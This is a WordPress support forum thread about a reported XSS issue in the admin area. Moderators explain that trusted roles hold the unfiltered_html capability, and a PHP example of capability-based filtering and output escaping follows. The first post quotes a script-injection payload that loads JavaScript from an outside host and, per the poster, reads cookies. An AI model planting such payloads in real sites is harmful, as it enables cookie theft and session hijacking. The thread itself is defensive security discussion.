[resolved] Huge Security Risk - how come nobody fixed that yet? (5 posts)

  1. euromark
    Posted 5 years ago

    http://ha.ckers.org/xss.html has some test strings (they are harmless). But others might not be!

    So how come nobody has solved this security risk yet?
    It's as easy as htmlspecialchars() on every comment / user input.

    See these examples:
    they are triggered in the backend as well as in the frontend (and can inject very dangerous code).

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    The result is:
    a) reading out all cookie data: "This is remote text via xss.js located at ha.ckers.org wp-settings-1=..."
    b) breaking the layout (white screen of death)
    c) and others
    And this is not even close to what XSS is capable of, just an example.
    Usually the admin is not aware of it, and the "dangerous code" has full admin rights as well. All GET/AJAX-related requests could be triggered automatically with full admin rights.

  2. Have you reported this yet? http://codex.wordpress.org/Security_FAQ

  3. euromark
    Posted 5 years ago

    I would have thought that somebody had already found that out - with 100000 distributions so far...^^

    For the public area I can install a code highlight plugin. Some are capable of securing the output (most are not!).
    But for the admin area I am not sure how to implement security hacks.

    Just started to use WordPress - and I am shocked.
    Those things are absolutely standard procedure in every web project.

  4. Chris_K
    Posted 5 years ago

    @euromark -- were you logged in to WordPress at the time?

    From Peter Westwood:

    This reads very much like the standard report of XSS issues which are only present when you are logged in as an admin as you are inherently a trusted user.

    The place to point the user is this FAQ entry - http://codex.wordpress.org/Security_FAQ#Why_are_some_users_allowed_to_post_unfiltered_HTML.3F

    Then ask them to report to security@wordpress.org if they find a real issue using a non-admin / editor user.

  5. Agreed, Admins and Editors have the unfiltered html capability, and yes, they can insert bad code. But if you don't have the user role to do that, then you can't do that.

    Make a new user lower than an Editor, then try your attack as that user. If it works, let us know.
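The capability split described in posts 4 and 5, and the output escaping suggested in post 1, as an added example (not code from the thread or from WordPress core). It assumes the WordPress API is loaded and uses a hypothetical plugin prefix `plugin_prefix_`; the sample input is the test string quoted in post 1.

```php
<?php
// Added example; assumes WordPress functions current_user_can(),
// wp_kses_post() and esc_html() are available (plugin context).

// Constructed sample input: the harmless test string from post 1 plus some benign markup.
$submitted = '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <b>hello</b>';

/**
 * Filter submitted HTML on save according to the submitting user's role.
 * Users holding the unfiltered_html capability (Administrators and, on a
 * single-site install, Editors) are trusted and keep their markup as-is.
 * Everyone else is reduced to the wp_kses_post() allowlist, which strips
 * the <script> element but keeps harmless inline tags such as <b>.
 */
function plugin_prefix_filter_on_save( string $raw ): string {
    if ( current_user_can( 'unfiltered_html' ) ) {
        return $raw;                // trusted role: stored unchanged
    }
    return wp_kses_post( $raw );    // untrusted role: allowlisted tags only
}

/**
 * For plain-text contexts (a comment author name, a title attribute, the
 * body of a code-highlight block) do not allow any markup at all: escape on
 * output so the browser renders the string instead of executing it. This is
 * the htmlspecialchars() approach from post 1; esc_html() is the WordPress
 * wrapper that also normalises the character set.
 */
function plugin_prefix_render_as_text( string $stored ): string {
    return esc_html( $stored );
}

// Usage (constructed): a low-privilege user submitting the test string.
$stored = plugin_prefix_filter_on_save( $submitted );   // " <b>hello</b>" for non-admins
echo plugin_prefix_render_as_text( $stored );           // "&lt;b&gt;hello&lt;/b&gt;"
```

The check post 5 asks for is exactly this: with a Subscriber or Contributor account the first function strips the script; only an unfiltered_html holder gets it stored verbatim.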

Topic Closed